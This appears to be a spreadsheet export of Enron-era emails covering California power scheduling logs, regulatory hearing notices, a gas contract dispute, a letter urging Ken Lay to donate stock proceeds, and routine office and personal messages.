  SC_ID: EES_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/24/01_x000D_
  UNIT_ID: BADLND_7_PL1X2_x000D_
_x000D_
_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 23 / Preferred: -525.00 / Final: -522.24)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/24/01_x000D_
  TRADING_SC: NES1_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 23 / Preferred:   5.37 / Final:   4.63)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/24/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 23 / Preferred:  48.96 / Final:  46.36)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/24/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/6/01; HourAhead hour: 10;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/6/01; HourAhead hour: 10;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001040610.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 10 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/6/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_SCOUT_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 11:33:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'keri.lynch@usa.net'})</t>
  </si>
  <si>
    <t>Keri Lynch_x000D_
719 W. Montrose_x000D_
Chicago, IL 60613_x000D_
keri.lynch@usa.net_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I believe it is your duty to to donate the millions of dollars you made from Enron stock before the bankruptcy to funds that assist former Enron employees who were so badly hit from this financial fiasco, such as Enron Employee Transition Fund and REACH. These funds also provide relief to low-income consumers in California, who can't afford to pay their energy bills._x000D_
_x000D_
It is now known that you personally gained $100 million off of Enron stock, while many Enron employees were financially devastated when the company declared bankruptcy.  Enron also profited from the California energy crisis last year.  As a result, thousands of consumers are unable to pay their basic energy bills and the largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of Enron stock while aggressively urging the employees to buy it.  You must know, in your heart, that this is truly unfair, unjust and unethical.  But there is something you can do to help make things right: please donate this money to funds set up to help repair the lives of Americans hurt by Enron's misdeeds.  I think it's the least you can do._x000D_
_x000D_
Thanks for your time._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Keri Lynch</t>
  </si>
  <si>
    <t>Tue, 26 Dec 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.rudolph@enron.com', 'alan.comnes@enron.com', 'george.mcclellan@enron.com', 'kevin.mcgowan@enron.com', 'stuart.staley@enron.com', 'skean@enron.com', 'sarah.novosel@enron.com', 'lisa.yoho@enron.com', 'mary.hain@enron.com', 'mona.petrochko@enron.com', 'lysa.akin@enron.com', 'eric.letke@enron.com', 'dennis.benevides@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'scott.stoness@enron.com', 'susan.mara@enron.com', 'harry.kingerski@enron.com', 'roger.yang@enron.com', 'wanda.curry@enron.com', 'michael.smith@enron.com', 'vicki.sharp@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>FW: RULING FOR HEARINGS ON 12/27 AND 12/28</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 12/26/2000 11:08 AM -----_x000D_
_x000D_
	JMB &lt;JBennett@GMSSR.com&gt;_x000D_
	12/22/2000 06:28 PM_x000D_
		 _x000D_
		 To: "'jdasovic@enron.com'" &lt;jdasovic@enron.com&gt;, "'msmith1@enron.com'" _x000D_
&lt;msmith1@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: RULING FOR HEARINGS ON 12/27 AND 12/28_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Minkin, Angela K. [mailto:ang@cpuc.ca.gov] _x000D_
Sent: Friday, December 22, 2000 4:07 PM_x000D_
_x000D_
Subject: RULING FOR HEARINGS ON 12/27 AND 12/28_x000D_
_x000D_
_x000D_
_x000D_
Parties, attached is the promised ruling that provides procedural guidance_x000D_
for the hearings on 12/27 and 12/28.  The ruling will also be posted on the_x000D_
web site as quickly as possible.  _x000D_
_x000D_
Thank you for your patience and I hope you can take a few moments to enjoy_x000D_
the holidays. _x000D_
_x000D_
--Angela Minkin _x000D_
Administrative Law Judge _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;1%P701!.doc&gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 06:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'henry.emery@painewebber.com'})</t>
  </si>
  <si>
    <t>Morning Meeting Highlights:</t>
  </si>
  <si>
    <t>The enclosed research report is being sent to you from PaineWebber by:_x000D_
_x000D_
 Emery Financial Group_x000D_
_x000D_
 713-957-7060_x000D_
_x000D_
 henry.emery@PaineWebber.COM_x000D_
_x000D_
Please contact them if you have any questions or would like to discuss this _x000D_
material._x000D_
_x000D_
The information contained in the attached research report is believed to be _x000D_
reliable, but its accuracy is not guaranteed.  PaineWebber Incorporated _x000D_
and/or Mitchell Hutchins Asset Management Inc., affiliated companies and/or _x000D_
their officers, directors, employees or stockholders may at times have a _x000D_
position, including an arbitrage position, in the securities described herein _x000D_
and may sell or buy them to or from customers.  These companies may from time _x000D_
to time act as a consultant to a company being reported upon._x000D_
_x000D_
You will need the Adobe Acrobat Reader to view this document.  If you don't _x000D_
already have it just click on this link, _x000D_
http://www.adobe.com/prodindex/acrobat/readstep.html, and follow the _x000D_
on-screen instructions.  The Acrobat Reader is free of charge._x000D_
_x000D_
_x000D_
_x000D_
 - PA05568520010309D02.pdf</t>
  </si>
  <si>
    <t>Tue, 12 Mar 2002 10:22:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mansoor.abdmoulaie@enron.com'})</t>
  </si>
  <si>
    <t>RE: Agave</t>
  </si>
  <si>
    <t>Kim_x000D_
As long as Earl receives a copy I am fine. Earl is our E&amp;C rep._x000D_
Mansoor_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Tuesday, March 12, 2002 9:43 AM_x000D_
To:	Chanley, Earl; Abdmoulaie, Mansoor_x000D_
Subject:	Agave_x000D_
_x000D_
Earl and Mansoor,_x000D_
_x000D_
I have received a copy of the as-built drawings for the TW/Agave Eddy County Interconnect.  Earl, as I understand it, you have a copy also.  Please confirm that you have what you need.  I will send my copy to Mansoor unless otherwise directed. _x000D_
_x000D_
Also, I have received an invoice from Agave for $245,904.20 for their work on this interconnect.  Earl, I believe Mark McConnell faxed you a copy a few weeks ago.  I need you both to approve the invoice so I can pay.  Do either of you have any comments regarding this invoice?  Does anyone else need to see it?  Please advise._x000D_
_x000D_
Thanks, Kim.</t>
  </si>
  <si>
    <t>Sun, 26 Nov 2000 23:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Please keep Bill and I in the loop.  Thanks._x000D_
_x000D_
_x000D_
From: Sara Shackleton on 11/22/2000 05:27 PM_x000D_
To: Tanya Rohauer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Global Finance Deals:  year-end, quarter-end, year round_x000D_
_x000D_
Tanya:_x000D_
_x000D_
This year is no different from any other year and we are always asked to _x000D_
review the swap component of the Global Finance structured deals.  We are _x000D_
also seeing lots of prepays._x000D_
_x000D_
Who is the credit person to be apprised of these transactions?  Should we _x000D_
immediately involve you and Bill?_x000D_
_x000D_
At the moment, Mary Cook, Angela Davis (legal finance group) and I are _x000D_
juggling the deals._x000D_
_x000D_
Please let me know and I'll alert the swap group.  Thanks.  Sara_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Mar 2002 13:19:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'etleaden@aol.com'})</t>
  </si>
  <si>
    <t>St. Louis Itinerary</t>
  </si>
  <si>
    <t>_x000D_
Arrive Tues 3/19 on AA #2656 @ 9:20a_x000D_
_x000D_
Depart Thurs 3/21 on AA #2999 @ 3:42p_x000D_
_x000D_
hotel:  Drury Plaza_x000D_
	4th &amp; Market St_x000D_
	St. Louis, MO 63102_x000D_
_x000D_
I have one dinner commitment on Tues night but it shouldn't last long._x000D_
_x000D_
Page # 888-582-7421_x000D_
cell # 281-615-7061</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.harper@enron.com'})</t>
  </si>
  <si>
    <t>Re: J-Block</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the quick response.  I sent it on to John.  Don't be surprised if _x000D_
he calls you;  you are the master of this deal._x000D_
_x000D_
Mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Richard Harper_x000D_
06/07/2000 09:30 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: J-Block  _x000D_
_x000D_
I have not been involved, but only last week a little bird told me that they _x000D_
have severe problems with reserve levels and expect to decline in 2002, when _x000D_
we were talking it was 2004 and then only by a small amount.  Agip is _x000D_
particularly adversely effected (as Agip in particular lacks reserves in the _x000D_
area).  I understand the development of Jade by BG and Phillips and the _x000D_
squeeze down of Texaco and OMV, the other Jade owners, by Agip  to sell their _x000D_
gas to Agip was driven by this lack of reserves._x000D_
_x000D_
You will recall that liquidated damages was a big issue they wanted to retain _x000D_
them rather than actual damages and we insisted that they remained at the _x000D_
same absolute level as in the old agreement, so I believe they are 40% of the _x000D_
new price (my memory is fading also).  I do recall that they all insisted _x000D_
that they would deliver the gas.  However, as with most companies the players _x000D_
have all moved on and a contract is a contract, afterall this was our _x000D_
approach.  Also I am sure they intended to maximise production from J-Block _x000D_
and did not forsee a shortage of production._x000D_
_x000D_
 It would be interesting to know if this is an agreed policy by them or _x000D_
whether one of the sellers is blocking the NBP sale by refusing to _x000D_
co-operate, they could do this because of the Common Stream Agreement.  _x000D_
Presumably they have not yet split the 3 agreements yet._x000D_
_x000D_
As to opportunity if they are short of reserves, perhaps they can buy _x000D_
themselves out of the situation, especially while the contract is in the _x000D_
money._x000D_
_x000D_
With my adversarial hat on perhaps BG want revenge for their loss in the _x000D_
appeal courts?   This is probably nearest to the truth._x000D_
_x000D_
I'm afraid this isn't much help and I do not recall any willful default _x000D_
provisions in the agreement._x000D_
_x000D_
Richard_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mike McConnell_x000D_
07/06/2000 14:49_x000D_
To: Richard Harper/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: J-Block_x000D_
_x000D_
Richard,_x000D_
 Hello from South America.  I am forwarding this email from John regarding _x000D_
the J-Block problems.  Have you been involved in this?  What are your _x000D_
thoughts?  If you have any ideas or can provide with some help, please _x000D_
follow-up.  This is confidential but i thought you could help.  When he _x000D_
mentioned this, I really couldn't remember much.  Amazing how the memory _x000D_
fades on some of the details in just a few years._x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 06/07/2000 _x000D_
08:47 AM ---------------------------_x000D_
_x000D_
_x000D_
John Sherriff_x000D_
06/06/2000 12:09 PM_x000D_
To: Jeff Skilling/Corp/Enron@ENRON_x000D_
cc: Mike McConnell/HOU/ECT@ECT, Richard Lewis/LON/ECT@ECT, Peter _x000D_
Crilly/LON/ECT@ECT _x000D_
Subject: J-Block_x000D_
_x000D_
_x000D_
I mentioned on our conference call on Monday that J-Block has had problems _x000D_
meeting our nominations from the Judy/Joanne/Janice reservoirs._x000D_
_x000D_
Up until recent CATS maintenance shutdown on 15 May, they were making up for _x000D_
reduced production volumes by nominating to supply gas at the NBP which they _x000D_
are entitled but not obliged to do.  Since return from outage at the end of _x000D_
May they have declined to nominate at the NBP.  _x000D_
_x000D_
From 1 January to 15 May, the Sellers use of the NBP delivery option kept _x000D_
underdeliveries to 350 mmcf (ie one day's maximum quantity) in total.  Since _x000D_
returning from the maintenance shutdown, underdeliveries have totalled 850 _x000D_
mmcf ( averaging 77mcf/d )._x000D_
_x000D_
We believe that following the sharp rise in market prices during the _x000D_
maintenance period, they have decided to default on the contract rather than _x000D_
make up deliveries from other sources.   They have an effective cap on the _x000D_
penalties of about 5 pence per therm (after taking into account the value of _x000D_
the liquids) and therefore they are not making up the volumes when the daily _x000D_
price is substantially higher than about 16 pence per therm._x000D_
_x000D_
Prior to the CATS shutdown, we had made them a proposal to enable them to _x000D_
deliver additional volumes at  another alternative to avoid default but they _x000D_
have not responded yet._x000D_
_x000D_
You mentioned that in your negotiations with Phillips they had committed to _x000D_
getting us all the gas regardless of the cap on the penalties.  This has cost _x000D_
us about $1.5 million to date and they seem to be institutionalising their _x000D_
non performance.    Perhaps a phone call by you might help.  _x000D_
_x000D_
By the way I will be in Houston on Thursday and Friday to meet with the _x000D_
delegation from Croatia and I will probably be tied up the entire time but if _x000D_
you need me_x000D_
for a phone call I can break away._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 10:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Thx for the spreadsheet.   2 questions : What time frame does this entail and _x000D_
does the correlation between the trader and AGG GAS include that trader's _x000D_
contribution to the floor's P&amp;L.  In other words, is my P&amp;L correlated with _x000D_
the floor or is it correlated to the rest of the floor absent me?_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Frank Hayden @ ENRON                           09/19/2000 02:41 PM_x000D_
	_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 03:18:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sscott5@enron.com', 'katyhester@hotmail.com'})</t>
  </si>
  <si>
    <t>hello girls- haven't heard from either of you in a while, and was hoping_x000D_
y'all were ok.  was supposed to be on a flight back to houston this morning,_x000D_
but obvioulsy that's off now.  just got bk from france late mon night- had_x000D_
lots of fun, race was ok, but looooong.  triped on harry potter's cape and_x000D_
had to go in ambulance to emergency room to get x-rays on my arm at the_x000D_
finish line.  quel surpris- sustain injury to my arm while running a_x000D_
marathon.  ok- am off.  just wanted to make sure you guys were alive and_x000D_
well and i haven't been blacklisted...._x000D_
e_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp</t>
  </si>
  <si>
    <t>Wed, 5 Dec 2001 08:51:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Kevin,_x000D_
 _x000D_
I'm at home today too.  Have you talked to anyone?_x000D_
 _x000D_
Fletch</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: trade</t>
  </si>
  <si>
    <t xml:space="preserve">i need to talk to you about the tv._x000D_
_x000D_
on the trade - i will give you my 6 and 12 for your 4_x000D_
_x000D_
let me know_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt; on 08/16/2000 02:33:04 PM_x000D_
To: "'Eric.Bass@enron.com'" &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: trade_x000D_
_x000D_
_x000D_
I don't know. Make me an offer._x000D_
_x000D_
Are you going to answer my email on the TV?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Eric.Bass@enron.com [mailto:Eric.Bass@enron.com]_x000D_
Sent: Wednesday, August 16, 2000 2:29 PM_x000D_
To: Bass, Jason_x000D_
Subject: RE: trade_x000D_
_x000D_
_x000D_
_x000D_
what do you want for your 4th round pick_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt; on 08/16/2000 12:21:46 PM_x000D_
_x000D_
To:   "'Eric.Bass@enron.com'" &lt;Eric.Bass@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: trade_x000D_
_x000D_
_x000D_
ok_x000D_
_x000D_
Jason Bass_x000D_
TSE_x000D_
Compaq Computer Corporation_x000D_
_x000D_
 -----Original Message-----_x000D_
From:     Eric.Bass@enron.com [mailto:Eric.Bass@enron.com]_x000D_
Sent:     Wednesday, August 16, 2000 11:53 AM_x000D_
To:  Bass, Jason_x000D_
Subject:  RE: trade_x000D_
_x000D_
_x000D_
the other side backed out_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt; on 08/16/2000 09:53:54 AM_x000D_
_x000D_
To:   "'Eric.Bass@enron.com'" &lt;Eric.Bass@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: trade_x000D_
_x000D_
_x000D_
ok_x000D_
_x000D_
-----Original Message-----_x000D_
From: Eric.Bass@enron.com [mailto:Eric.Bass@enron.com]_x000D_
Sent: Wednesday, August 16, 2000 9:52 AM_x000D_
To: Bass, Jason_x000D_
Subject: RE: trade_x000D_
_x000D_
_x000D_
_x000D_
i have to swing the other side of it , i'll let you know_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt; on 08/16/2000 09:45:59 AM_x000D_
_x000D_
To:   "'Eric Bass'" &lt;Eric.Bass@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: trade_x000D_
_x000D_
_x000D_
I will do that._x000D_
_x000D_
-----Original Message-----_x000D_
From: Eric Bass [mailto:Eric.Bass@enron.com]_x000D_
Sent: Tuesday, August 15, 2000 2:04 PM_x000D_
To: Bass, Jason_x000D_
Subject: trade_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
how about the final pick in the 2nd and my third for your 2nd and your 4th_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:53:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.schwartzenburg@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> Kay, I just heard about your Dad. I am so sorry. I hope you and your family are ok. Hang in these.</t>
  </si>
  <si>
    <t>Sat, 26 Jan 2002 13:37:23 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/26/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/26/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012616.txt</t>
  </si>
  <si>
    <t>Thu, 11 May 2000 02:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Home Page - New - Risk Solutions (http://www.marshweb.com/home/ho_x000D_
 mepg.nsf/AllDo</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/11/2000 _x000D_
09:03 AM ---------------------------_x000D_
_x000D_
_x000D_
dgoodburn@rochpar.com on 05/11/2000 08:11:57 AM_x000D_
To: Vince.J.Kaminski@enron.com, vkaminski@aol.com_x000D_
cc:  _x000D_
Subject: Home Page - New - Risk Solutions (http://www.marshweb.com/home/ho _x000D_
mepg.nsf/AllDo_x000D_
_x000D_
_x000D_
 &lt;&lt;Home Page - New - Risk Solutions.htm&gt;&gt;_x000D_
_x000D_
Dear Vincent,_x000D_
_x000D_
Hope all is well across the Atlantic. You may have seen this already but_x000D_
thought I would pass it on just in case. Also Socgen just pulled off a_x000D_
weather deal for a Japanease company looking to protect against wind damage_x000D_
on their flower crop._x000D_
_x000D_
Weather is definatly picking up on this side too with more interest every_x000D_
day._x000D_
_x000D_
Hope all is well,_x000D_
_x000D_
_x000D_
Damian Goodburn_x000D_
_x000D_
Office - 44 20 7847 1829_x000D_
Mobile - 07971 825 309_x000D_
_x000D_
 - Home Page - New - Risk Solutions.htm_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 02:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: A Request</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
I will supply a generic example._x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
03/06/2001 09:31 AM_x000D_
To: Zimin Lu/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: A Request_x000D_
_x000D_
Zimin,_x000D_
_x000D_
It seems that the academia is catching up._x000D_
Do you have a realistic case we can show them?_x000D_
Something generic._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/06/2001 _x000D_
09:31 AM ---------------------------_x000D_
_x000D_
_x000D_
ds64@cyrus.andrew.cmu.edu on 03/02/2001 09:39:43 AM_x000D_
To: "Vince J Kaminski" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: A Request_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
I am writing to ask for your help with some research I am doing with John_x000D_
Lehoczky and a PhD student.  We trying to apply recent advances in Monte_x000D_
Carlo for American options to value Swing and other options with multiple_x000D_
early exercise decisions that are important in energy markets.  I know in_x000D_
general that early exercise shows up in a wide range of energy contracts,_x000D_
both real as welll as financial.  Would it be possible for you, either via_x000D_
email or on the phone, to give us some examples of typical terms for such_x000D_
instruments?  We would like our examples to look realistic.  We also want to_x000D_
make sure we are focusing on the right sorts of optionality._x000D_
_x000D_
Thanks in advance,_x000D_
Duane_x000D_
_x000D_
********_x000D_
Duane Seppi_x000D_
_x000D_
Graduate School of Industrial Administration_x000D_
Carnegie Mellon University_x000D_
Pittsburgh PA  15213-3890_x000D_
_x000D_
tel. (412) 268-2298_x000D_
fax (412) 268-8896_x000D_
_x000D_
email ds64+@andrew.cmu.edu_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 02:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Important United Way Reminder</t>
  </si>
  <si>
    <t xml:space="preserve">Kathy,_x000D_
_x000D_
I will be out of town on Thursday and Friday, and will therefore be unable to _x000D_
attend._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay </t>
  </si>
  <si>
    <t>Sun, 13 May 2001 12:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EWS Brown Bag</t>
  </si>
  <si>
    <t>MARK YOUR LUNCH CALENDARS NOW !_x000D_
_x000D_
You are invited to attend the EWS Brown Bag Lunch Series_x000D_
_x000D_
Featuring:  MICHAEL L. MILLER_x000D_
_x000D_
Topic:  Principal Investments_x000D_
_x000D_
Thursday, May 17, 2001_x000D_
11:30 a.m. - 12:30 p.m._x000D_
EB 5 C2_x000D_
_x000D_
You bring your lunch,          Limited Seating_x000D_
We provide drinks and dessert.        RSVP  e-mail Kathie Grabstald_x000D_
                   or call x 3-9610</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Recurring Lunch Meetings</t>
  </si>
  <si>
    <t>Taffy,_x000D_
_x000D_
Mary is the new lawyer in charge of the paralegals (someone needs to keep us _x000D_
in line, being the wild and crazy gals we are!).  Can you put these _x000D_
re-occuring meetings on my calendar and call it "Paralegal Lunch Meeting".  _x000D_
Thanks!_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 01/30/2001 10:11 AM -----_x000D_
_x000D_
	Mary Cook_x000D_
	01/30/2001 10:06 AM_x000D_
		 _x000D_
		 To: Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Tana _x000D_
Jones/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron, Legal Temp 4/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Recurring Lunch Meetings_x000D_
_x000D_
_x000D_
Please note that we will commence our lunch meetings together as of Thursday _x000D_
February 15th from 11:45 to 1:00.  The meetings will generally recur every _x000D_
two weeks thereafter so mark your calendars.  I will let you know the _x000D_
location as soon as we find an open conference room._x000D_
_x000D_
Carla, by copy to you please find a conference room and schedule it for the _x000D_
recurring time as above stated and let us know which room.  Also, set on your _x000D_
calendar reminders for emailing a reminder to the paralegals and myself each _x000D_
Wednesday prior to the Thursday meeting, and for ordering lunch/drinks for _x000D_
each meeting.  Also set a recurring meeting on my calendar noting this _x000D_
meeting schedule._x000D_
_x000D_
Thanks._x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'deirdre.mccaffrey@enron.com'})</t>
  </si>
  <si>
    <t>I do not find any agreements or transactions under either C &amp;G Retail or _x000D_
Dominium? Please let me know if I can be of further assistance._x000D_
_x000D_
_x000D_
DP_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 08:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'trademup@yahoo.com', 'geoff.storey@enron.com'})</t>
  </si>
  <si>
    <t>Crain's - January 15, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Hunter S Shively/HOU/ECT on 01/17/2001 _x000D_
04:21 PM ---------------------------_x000D_
From: James D Steffes@ENRON on 01/15/2001 10:22 AM_x000D_
To: Laura Luce/Corp/Enron@Enron, Hunter S Shively/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Crain's - January 15, 2001_x000D_
_x000D_
FYI.  Some interesting articles on Chicago natural gas issues._x000D_
_x000D_
Laura - I am in the office on Tuesday.  Would you like to talk about these _x000D_
matters?_x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 01/15/2001 10:19 AM -----_x000D_
_x000D_
	Susan M Landwehr_x000D_
	01/14/2001 10:52 AM_x000D_
		 _x000D_
		 To: James D Steffes/NA/Enron@Enron_x000D_
		 cc: Harry Kingerski/NA/Enron@Enron, Janine Migden/NA/Enron@Enron, Roy _x000D_
Boston/HOU/EES@EES_x000D_
		 Subject: Crain's - January 15, 2001_x000D_
_x000D_
Jim--please take a look at these articles that will come out in the Crains _x000D_
magazine tomorrow.  You'll see that there are both opportunities and potholes _x000D_
for us on this issue.    It is very likely that we will get sucked into this _x000D_
debate----the ENA/ Peoples deal which has generally floated under the _x000D_
regulatory radar in the past is inevitably going to become more prominent. _x000D_
(Evidence even before these articles is that I received a call from the ICC _x000D_
staff late last week asking if we could participate in an ICC meeting on _x000D_
natural gas issue on Jan 23).  _x000D_
_x000D_
The articles (and the gossip that I have heard in the past few weeks) point _x000D_
out that Peoples is in hot water politically--I would hate to see us dragged _x000D_
into that sesspool.  On the other hand, if ENA sees significant business _x000D_
opportunities that could be opened up to them in Illinois by a change in the _x000D_
regulatory climate, this could be the time to make the play....while the _x000D_
issue is hot and there may be pressure on the ICC to take some steps that _x000D_
they normally would not._x000D_
_x000D_
I'd appreciate it if we could plan a call to talk about strategy on _x000D_
Illinois.  I am going to have to give a response to ICC on Tuesday and we _x000D_
will need to determine who would particpate in the meeting at the ICC.  Roy _x000D_
and I had put in a call to Laura Luce last Thursday to discuss the request _x000D_
from the ICC...I have not heard back from her, but Roy may have.  _x000D_
_x000D_
Are you available on Tuesday for a conference call?  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
